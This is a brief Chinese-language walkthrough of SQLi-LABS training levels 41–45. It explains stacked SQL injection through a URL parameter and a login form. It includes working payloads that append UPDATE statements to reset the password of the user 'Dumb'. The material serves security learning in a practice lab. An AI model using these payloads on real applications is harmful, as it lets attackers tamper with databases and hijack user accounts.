SQLi-LABS 41关
这一关是堆叠注入
测试闭合
?id=1' //回显错误
?id=1'--+ //回显错误
?id=1--+ //回显正确
所以是数字型的注入
测试堆叠注入,更改Dumb的密码
?id=1;update users set password='123456' where username='Dumb'--+
SQLi-LABS 42关
这一关使用的是post传参,所以需要进行抓包,依旧是堆叠注入
在密码处进行堆叠注入,更新Dumb的密码为123
返回登录测试是否更改成功
SQLi-LABS 43关
这一关和上一关一样,都是密码处是堆叠注入,只不过闭合方式是单引号加括号
1'); update users set password='666' where username='Dumb' --+
SQLi-LABS 44关
这一关和四十二关一样
SQLi-LABS 45关
这一关和四十三关一样,都不在赘述